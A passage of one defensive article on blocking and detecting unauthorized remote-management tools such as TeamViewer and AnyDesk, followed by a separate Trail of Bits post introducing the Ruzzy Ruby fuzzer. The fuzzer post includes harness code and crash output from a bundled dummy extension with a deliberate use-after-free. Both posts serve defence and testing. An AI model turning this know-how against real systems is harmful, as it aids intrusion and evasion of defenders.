Another potentially fruitful approach to firewall traffic blocking is by port number. For example, TeamViewer prefers to use port 5938, although it can fall back on the practically unblockable port 443. While blocking port 5938 would not stop the connection, a properly configured alert would provide defenders with an early warning that TeamViewer was trying to connect out.

Some firewalls also provide additional functionality around session content, similar to Umbrella’s capabilities. Firewalls such as Cisco’s Meraki provide an allow/block URL listing that can be configured to prevent connectivity to unapproved remote management software sites. Cisco Meraki can provide content filtering options that may be helpful in blocking remote management/access sites.

Administrators should consider that firewall controls to combat unauthorized remote software management connections can have unintended consequences and should be heavily tested and piloted prior to implementation.

Verify that IP addresses are dedicated to that application prior to blocking in order to avoid blocking Content Delivery Network (CDN) nodes or other cloud computing shared resources. 

Finally, network segmentation or micro-segmentation can be useful in blocking unauthorized remote management software usage. For instance, categorizing and organizing server resources separate from workstation resources can allow for more tailored options around blocking all unnecessary traffic at the firewall, include that which may be associated with remote management tools. Some organizations already do this well by integrating with group policy configurations.

Host-based controls

Windows Defender Application Control (WDAC) and AppLocker

Of all the controls discussed in this post, WDAC and AppLocker are the only ones that can offer almost 100 percent protection against unauthorized remote management/access software execution.

In their most secure configuration, which allows only pre-approved software to run, users or adversaries can't run unexpected executables. However, this comes at a cost, as the approved software baseline maintenance level of effort can be high, and the user experience can be very limited if they are not allowed to install applications as needed.

WDAC and AppLocker offer considerable flexibility in their policies, so some organizations choose to only lock down their critical servers, such as domain controllers, which leaves user system policies more flexible. This approach has benefits far beyond simply blocking remote access/management software, as it will stop most malware from executing, as well.

Keep in mind that, while WDAC is currently more difficult to configure, it has more advanced capabilities and Microsoft is positioning it as the replacement for AppLocker. At the moment, AppLocker is receiving security updates, but no new feature updates.

Registry filename blocks

It is possible to block remote management/access software execution by filename via a registry “DisallowRun” key. However, Talos IR does not recommend this approach, except as a containment measure during incident response, since it is not scalable as a preventative measure and is trivially easy to bypass by renaming the executable or modifying the registry. 

EDR blocks

Almost every modern EDR can block file hashes, which gives defenders the capability to block the hashes associated with remote management/access software installers and/or installed executables. However, similarly to the filename GPO blocks, this is not scalable or reliable as a proactive measure, since every new version of every software distribution will have a new hash value. This measure should be restricted to containment during incident response only. 

Some EDR solutions offer methods to block vulnerable or unauthorized software, albeit with significant caveats regarding the limitations of those capabilities. The authors of this article have not tested those capabilities but note them here for the sake of completeness.

Host-based firewalls

The recommendations for host-based firewall rules are much the same as standalone firewalls, covered above. These can be useful where administrators expect users to roam outside of the boundary of the corporate network, such as home workers off the corporate VPN or using a split-tunnel VPN implementation. 

Administrator permission restriction

Restricting administrator permissions so that most users cannot conduct administrator actions on their work computer, such as installing remote access/management software, can help limit an adversary’s ability to install this software after the initial compromise.

Applying the principle of least privilege, which includes both locking down local administrator permissions and limiting the permissions of users’ domain accounts, is considered standard best practice.

NAC controls

While network access control (NAC) solutions do not directly block the use of remote management software, they can ensure that all other technical controls are working properly before admitting an endpoint to the network. If the device is a rogue system or lacks EDR, for example, NAC would prevent it from joining.

Another benefit offered by a NAC solution is software version enforcement through custom rules. In Cisco ISE, for example, there are Posture Checks. Organizations can use this to ensure that only the approved version(s) of their approved remote management tool are allowed on the network, directly addressing the threat of an adversary introducing an older version of the approved solution to the network for malicious purposes.

Alerts and forensics

Due to the complexity of implementing all these controls, detection rules can serve as a backup in case an adversary finds a way to circumvent the previous mitigations we discussed. The possibilities for these “tripwire” detections are endless, and SOCs/threat-hunting teams should continuously think of ways to improve them, but some ideas are listed below.

Central log collection

The first prerequisite for any successful detections is to have centralized log aggregation. At the very minimum, this should ingest firewall logs, EDR alerts and Windows Event logs for key servers. 

SIEM alerts for suspicious strings

Setting up a simple alert that triggers upon observation of strings associated with unauthorized remote access/management software product names (e.g., “AnyDesk”) can be an effective way to proactively identify unexpected product installations that were not otherwise blocked.

For example, an MSI installation would generate an Event 11707 entry in the Windows Application Event logs containing the software product name. If the SIEM were ingesting and evaluating those event logs, it would fire an alert, thereby alerting the SOC to a potential installation. This rule would need to be tuned to avoid excessive false positives, but it could result in a valuable early detection method. 

SIEM alerts for firewall blocks on unique ports

Enhanced alerting may be necessary to draw a SOC’s attention to firewall blocks associated with remote management/access traffic. Firewalls continuously block traffic, generally dropping thousands or millions of packets per hour. With that in mind, SOCs are not alerted every time a firewall rule drops traffic — especially if the rule that drops the traffic is the Implicit Deny rule blocking all traffic that was not specifically allowed. However, if an internal host attempts to communicate over a port dedicated to remote access/management software, that might merit attention from the SOC. 

It's worth considering creating an SIEM rule that alerts on any firewall block event involving outbound traffic to certain key ports, for example, 5938 (associated with TeamViewer). That alert, while an indication that the network blocks are working as intended, would be a good indication that the SOC needs to investigate the system originating the traffic.

The level of effort required to properly secure remote management/access software is daunting. However, the frequency of use by adversaries makes that effort a necessity. In the wrong hands, these tools serve as a ready-made command and control mechanism. If an organization can afford to secure its VPN solution, it should almost certainly devote resources to locking down unauthorized remote management software, as well.

Introducing Ruzzy, a coverage-guided Ruby fuzzer

By Matt Schwager

Trail of Bits is excited to introduce Ruzzy, a coverage-guided fuzzer for pure Ruby code and Ruby C extensions. Fuzzing helps find bugs in software that processes untrusted input. In pure Ruby, these bugs may result in unexpected exceptions that could lead to denial of service, and in Ruby C extensions, they may result in memory corruption. Notably, the Ruby community has been missing a tool it can use to fuzz code for such bugs. We decided to fill that gap by building Ruzzy.

Ruzzy is heavily inspired by Google’s Atheris, a Python fuzzer. Like Atheris, Ruzzy uses libFuzzer for its coverage instrumentation and fuzzing engine. Ruzzy also supports AddressSanitizer and UndefinedBehaviorSanitizer when fuzzing C extensions.

This post will go over our motivation behind building Ruzzy, provide a brief overview of installing and running the tool, and discuss some of its interesting implementation details. Ruby revelers rejoice, Ruzzy* is here to reveal a new era of resilient Ruby repositories.

* If you’re curious, Ruzzy is simply a portmanteau of Ruby and fuzz, or fuzzer.

Bringing fuzz testing to Ruby

The Trail of Bits Testing Handbook provides the following definition of fuzzing:

Fuzzing represents a dynamic testing method that inputs malformed or unpredictable data to a system to detect security issues, bugs, or system failures. We consider it an essential tool to include in your testing suite.

Fuzzing is an important testing methodology when developing high-assurance software, even in Ruby. Consider AFL’s extensive trophy case, rust-fuzz’s trophy case, and OSS-Fuzz’s claim that it’s helped find and fix over 10,000 security vulnerabilities and 36,000 bugs with fuzzing. As mentioned previously, Python has Atheris. Java has Jazzer. The Ruby community deserves a high-quality, modern fuzzing tool too.

This isn’t to say that Ruby fuzzers haven’t been built before. They have: kisaten, afl-ruby, FuzzBert, and perhaps some we’ve missed. However, all these tools appear to be either unmaintained, difficult to use, lacking features, or all of the above. To address these challenges, Ruzzy is built on three principles:

  1. Fuzz pure Ruby code and Ruby C extensions
  2. Make fuzzing easy by providing a RubyGems installation process and simple interface
  3. Integrate with the extensive libFuzzer ecosystem

With that, let’s give this thing a test drive.

Installing and running Ruzzy

The Ruzzy repository is well documented, so this post will provide an abridged version of installing and running the tool. The goal here is to provide a quick overview of what using Ruzzy looks like. For more information, check out the repository.

First things first, Ruzzy requires a Linux environment and a recent version of Clang (we’ve tested back to version 14.0.0). Releases of Clang can be found on its GitHub releases page. If you’re on a Mac or Windows computer, then you can use Docker Desktop on Mac or Windows as your Linux environment. You can then use Ruzzy’s Docker development environment to run the tool. With that out of the way, let’s get started.

Run the following command to install Ruzzy from RubyGems:

MAKE="make --environment-overrides V=1" \
CC="/path/to/clang" \
CXX="/path/to/clang++" \
LDSHARED="/path/to/clang -shared" \
LDSHAREDXX="/path/to/clang++ -shared" \
    gem install ruzzy

These environment variables ensure the tool is compiled and installed correctly. They will be explored in greater detail later in this post. Make sure to update the /path/to portions to point to your clang installation.

Fuzzing Ruby C extensions

To facilitate testing the tool, Ruzzy includes a “dummy” C extension with a heap-use-after-free bug. This section will demonstrate using Ruzzy to fuzz this vulnerable C extension.

First, we need to configure Ruzzy’s required sanitizer options:

export ASAN_OPTIONS="allocator_may_return_null=1:detect_leaks=0:use_sigaltstack=0"

(See the Ruzzy README for why these options are necessary in this context.)

Next, start fuzzing:

LD_PRELOAD=$(ruby -e 'require "ruzzy"; print Ruzzy::ASAN_PATH') \
    ruby -e 'require "ruzzy"; Ruzzy.dummy'

LD_PRELOAD is required for the same reason that Atheris requires it. That is, it uses a special shared object that provides access to libFuzzer’s sanitizers. Now that Ruzzy is fuzzing, it should quickly produce a crash like the following:

INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2527961537
...
==45==ERROR: AddressSanitizer: heap-use-after-free on address 0x50c0009bab80 at pc 0xffff99ea1b44 bp 0xffffce8a67d0 sp 0xffffce8a67c8
...
SUMMARY: AddressSanitizer: heap-use-after-free /var/lib/gems/3.1.0/gems/ruzzy-0.7.0/ext/dummy/dummy.c:18:24 in _c_dummy_test_one_input
...
==45==ABORTING
MS: 4 EraseBytes-CopyPart-CopyPart-ChangeBit-; base unit: 410e5346bca8ee150ffd507311dd85789f2e171e
0x48,0x49,
HI
artifact_prefix='./'; Test unit written to ./crash-253420c1158bc6382093d409ce2e9cff5806e980
Base64: SEk=

Fuzzing pure Ruby code

Fuzzing pure Ruby code requires two Ruby scripts: a tracer script and a fuzzing harness. The tracer script is required due to an implementation detail of the Ruby interpreter. Every tracer script will look nearly identical. The only difference will be the name of the Ruby script you’re tracing.

First, the tracer script. Let’s call it test_tracer.rb:

require 'ruzzy'

Ruzzy.trace('test_harness.rb')

Next, the fuzzing harness. A fuzzing harness wraps a fuzzing target and passes it to the fuzzing engine. In this case, we have a simple fuzzing target that crashes when it receives the input “FUZZ.” It’s a contrived example, but it demonstrates Ruzzy’s ability to find inputs that maximize code coverage and produce crashes. Let’s call this harness test_harness.rb:

require 'ruzzy'

def fuzzing_target(input)
  if input.length == 4
    if input[0] == 'F'
      if input[1] == 'U'
        if input[2] == 'Z'
          if input[3] == 'Z'
            raise
          end
        end
      end
    end
  end
end

test_one_input = lambda do |data|
  fuzzing_target(data) # Your fuzzing target would go here
  return 0
end

Ruzzy.fuzz(test_one_input)

You can start the fuzzing process with the following command:

LD_PRELOAD=$(ruby -e 'require "ruzzy"; print Ruzzy::ASAN_PATH') \
    ruby test_tracer.rb

This should quickly produce a crash like the following:

INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2311041000
...
/app/ruzzy/bin/test_harness.rb:12:in `block in ': unhandled exception
    from /var/lib/gems/3.1.0/gems/ruzzy-0.7.0/lib/ruzzy.rb:15:in `c_fuzz'
    from /var/lib/gems/3.1.0/gems/ruzzy-0.7.0/lib/ruzzy.rb:15:in `fuzz'
    from /app/ruzzy/bin/test_harness.rb:35:in `'
    from bin/test_tracer.rb:7:in `require_relative'
    from bin/test_tracer.rb:7:in `
' ... SUMMARY: libFuzzer: fuzz target exited MS: 1 CopyPart-; base unit: 24b4b428cf94c21616893d6f94b30398a49d27cc 0x46,0x55,0x5a,0x5a, FUZZ artifact_prefix='./'; Test unit written to ./crash-aea2e3923af219a8956f626558ef32f30a914ebc Base64: RlVaWg==

Ruzzy used libFuzzer’s coverage-guided instrumentation to discover the input (“FUZZ”) that produces a crash. This is one of Ruzzy’s key contributions: coverage-guided support for pure Ruby code. We will discuss coverage support and more in the next section.

Interesting implementation details

You don’t need to understand this section to use Ruzzy, but fuzzing can often be more art than science, so we wanted to share some details to help demystify this dark art. We certainly learned a lot from the blog posts describing Atheris and Jazzer, so we figured we’d pay it forward. Of course, there are many interesting details that go into creating a tool like this but we’ll focus on three: creating a Ruby fuzzing harness, compiling Ruby C extensions with libFuzzer, and adding coverage support for pure Ruby code.

Creating a Ruby fuzzing harness

One of the first things you need when embarking on a fuzzing campaign is a fuzzing harness. The Trail of Bits Testing Handbook defines a fuzzing harness as follows:

A harness handles the test setup for a given target. The harness wraps the software and initializes it such that it is ready for executing test cases. A harness integrates a target into a testing environment.

When fuzzing Ruby code, naturally we want to write our fuzzing harness in Ruby, too. This speaks to goal number 2 from the beginning of this post: make fuzzing Ruby simple and easy. However, a problem arises when we consider that libFuzzer is written in C/C++. When using libFuzzer as a library, we need to pass a C function pointer to LLVMFuzzerRunDriver to initiate the fuzzing process. How can we pass arbitrary Ruby code to a C/C++ library?

Using a foreign function interface (FFI) like Ruby-FFI is one possibility. However, FFIs are generally used to go the other direction: calling C/C++ code from Ruby. Ruby C extensions seem like another possibility, but we still need to figure out a way to pass arbitrary Ruby code to a C extension. After much digging around in the Ruby C extension API, we discovered the rb_proc_call function. This function allowed us to use Ruby C extensions to bridge the gap between Ruby code and the libFuzzer C/C++ implementation.

In Ruby, a Proc is “an encapsulation of a block of code, which can be stored in a local variable, passed to a method or another Proc, and can be called. Proc is an essential concept in Ruby and a core of its functional programming features.” Perfect, this is exactly what we needed. In Ruby, all lambda functions are also Procs, so we can write fuzzing harnesses like the following:

require 'json'
require 'ruzzy'

json_target = lambda do |data|
  JSON.parse(data)
  return 0
end

Ruzzy.fuzz(json_target)

In this example, the json_target lambda function is passed to Ruzzy.fuzz. Behind the scenes Ruzzy uses two language features to bridge the gap between Ruby code and a C interface: Ruby Procs and C function pointers. First, Ruzzy calls LLVMFuzzerRunDriver with a function pointer. Then, every time that function pointer is invoked, it calls rb_proc_call to execute the Ruby target. This allows the C/C++ fuzzing engine to repeatedly call the Ruby target with fuzzed data. Considering the example above, since all lambda functions are Procs, this accomplishes the goal of calling arbitrary Ruby code from a C/C++ library.

As with all good, high-level overviews, this is an oversimplification of how Ruzzy works. You can see the exact implementation in cruzzy.c.

Compiling Ruby C extensions with libFuzzer

Before we proceed, it’s important to understand that there are two Ruby C extensions we are considering: the Ruzzy C extension that hooks into the libFuzzer fuzzing engine and the Ruby C extensions that become our fuzzing targets. The previous section discussed the Ruzzy C extension implementation. This section discusses Ruby C extension targets. These are third-party libraries that use Ruby C extensions that we’d like to fuzz.

To fuzz a Ruby C extension, we need a way to compile the extension with libFuzzer and its associated sanitizers. Compiling C/C++ code for fuzzing requires special compile-time flags, so we need a way to inject these flags into the C extension compilation process. Dynamically adding these flags is important because we’d like to install and fuzz Ruby gems without having to modify the underlying code.

The mkmf, or MakeMakefile, module is the primary interface for compiling Ruby C extensions. The gem install process calls a gem-specific Ruby script, typically named extconf.rb, which calls the mkmf module. The process looks roughly like this:

gem install -> extconf.rb -> mkmf -> Makefile -> gcc/clang/CC -> extension.so

Unfortunately, by default mkmf does not respect common C/C++ compilation environment variables like CC, CXX, and CFLAGS. However, we can force this behavior by setting the following environment variable: MAKE="make --environment-overrides". This tells make that environment variables override Makefile variables. With that, we can use the following command to install Ruby gems containing C extensions with the appropriate fuzzing flags:

MAKE="make --environment-overrides V=1" \
CC="/path/to/clang" \
CXX="/path/to/clang++" \
LDSHARED="/path/to/clang -shared" \
LDSHAREDXX="/path/to/clang++ -shared" \
CFLAGS="-fsanitize=address,fuzzer-no-link -fno-omit-frame-pointer -fno-common -fPIC -g" \
CXXFLAGS="-fsanitize=address,fuzzer-no-link -fno-omit-frame-pointer -fno-common -fPIC -g" \
    gem install msgpack

The gem we’re installing is msgpack, an example of a gem containing a C extension component. Since it deserializes binary data, it makes a great fuzzing target. From here, if we wanted to fuzz msgpack, we would create an msgpack fuzzing harness and initiate the fuzzing process.

If you’d like to find more fuzzing targets, searching GitHub for extconf.rb files is one of the best ways we’ve found to identify good C extension candidates.

Adding coverage support for pure Ruby code

Instead of Ruby C extensions, what if we want to fuzz pure Ruby code? That is, Ruby projects that do not contain a C extension component. If modifying install-time functionality via lengthy, not-officially-supported environment variables is a hacky solution, then what follows is not for the faint of heart. But, hey, a working solution with a little artistic freedom is better than no solution at all.

First, we need to cover the motivation for coverage support. Fuzzers derive some of their “smarts” from analyzing coverage information. This is a lot like code coverage information provided by unit and integration tests. While fuzzing, most fuzzers prioritize inputs that unlock new code branches. This increases the likelihood that they will find crashes and bugs. When fuzzing Ruby C extensions, Ruzzy can punt coverage instrumentation for C code to Clang. With pure Ruby code, we have no such luxury.

While implementing Ruzzy, we discovered one supremely useful piece of functionality: the Ruby Coverage module. The problem is that it cannot easily be called in real time by C extensions. If you recall, Ruzzy uses its own C extension to pass fuzz harness code to LLVMFuzzerRunDriver. To implement our pure Ruby coverage “smarts,” we need to pass in Ruby coverage information to libFuzzer in real time as the fuzzing engine executes. The Coverage module is great if you have a known start and stop point of execution, but not if you need to continuously gather coverage information and pass it to libFuzzer. However, we know the Coverage module must be implemented somehow, so we dug into the Ruby interpreter’s C implementation to learn more.

Enter Ruby event hooking. The TracePoint module is the official Ruby API for listening for certain types of events like calling a function, returning from a routine, executing a line of code, and many more. When these events fire, you can execute a callback function to handle the event however you’d like. So, this sounds great, and exactly like what we need. When we’re trying to track coverage information, what we’d really like to do is listen for branching events. This is what the Coverage module is doing, so we know it must exist under the hood somewhere.

Fortunately, the public Ruby C API provides access to this event hooking functionality via the rb_add_event_hook2 function. This function takes a list of events to hook and a callback function to execute whenever one of those events fires. By digging around in the source code a bit, we find that the list of possible events looks very similar to the list in the TracePoint module:

 37    #define RUBY_EVENT_NONE      0x0000 /**
 38    #define RUBY_EVENT_LINE      0x0001 /**
 39    #define RUBY_EVENT_CLASS     0x0002 /**
 40    #define RUBY_EVENT_END       0x0004 /**
       ...

Ruby event hook types

If you keep digging, you’ll notice a distinct lack of one type of event: coverage events. But why? The Coverage module appears to be handling these events. If you continue digging, you’ll find that there are in fact coverage events, and that is how the Coverage module works, but you don’t have access to them. They’re defined as part of a private, internal-only portion of the Ruby C API:

 2182    /* #define RUBY_EVENT_RESERVED_FOR_INTERNAL_USE 0x030000 */ /* from vm_core.h */
 2183    #define RUBY_EVENT_COVERAGE_LINE                0x010000
 2184    #define RUBY_EVENT_COVERAGE_BRANCH              0x020000

Private coverage event hook types

That’s the bad news. The good news is that we can define the RUBY_EVENT_COVERAGE_BRANCH event hook ourselves and set it to the correct, constant value in our code, and rb_add_event_hook2 will still respect it. So we can use Ruby’s built-in coverage tracking after all! We can feed this data into libFuzzer in real time and it will fuzz accordingly. Discussing how to feed this data into libFuzzer is beyond the scope of this post, but if you’d like to learn more, we use SanitizerCoverage’s inline 8-bit counters, PC-Table, and data flow tracing.

There’s just one more thing.

During our testing, even though we added the correct event hook, we still weren’t successfully hooking coverage events. The Coverage module must be doing something we’re not seeing. If we call Coverage.start(branches: true), per the Coverage documentation, then things work as expected. The details here involve a lot of sleuthing in the Ruby interpreter source code, so we’ll cut to the chase. As best we can tell, it appears that calling Coverage.start, which effectively calls Coverage.setup, initializes some global state in the Ruby interpreter that allows for hooking coverage events. This initialization functionality is also part of a private, internal-only API. The easiest solution we could come up with was calling Coverage.setup(branches: true) before we start fuzzing. With that, we began successfully hooking coverage events as expected.

Having coverage events included in the standard library made our lives a lot easier. Without it, we may have had to resort to much more invasive and cumbersome solutions like modifying the Ruby code the interpreter sees in real time. However, it would have made our lives even easier if hooking coverage events were part of the official, public Ruby C API. We’re currently tracking this request at trailofbits/ruzzy#9.

Again, the information presented here is a slight oversimplification of the implementation details; if you’d like to learn more, then cruzzy.c and ruzzy.rb are great places to start.

Find more Ruby bugs with Ruzzy

We faced some interesting challenges while building this tool and attempted to hide much of the complexity behind a simple, easy to use interface. When using the tool, the implementation details should not become a hindrance or an annoyance. However, discussing them here in detail may spur the next fuzzer implementation or step forward in the fuzzing community. As mentioned previously, the Atheris and Jazzer posts were a great inspiration to us, so we figured we’d pay it forward.

Building the tool is just the beginning. The real value comes when we start using the tool to find bugs. Like Atheris for Python, and Jazzer for Java before it, Ruzzy is an attempt to bring a higher level of software assurance to the Ruby community. If you find a bug using Ruzzy, feel free to open a PR against our trophy case with a link to the issue.

If you’d like to read more about our work on fuzzing, check out the following posts:

Contact us if you’re interested in custom fuzzing for your project.

❌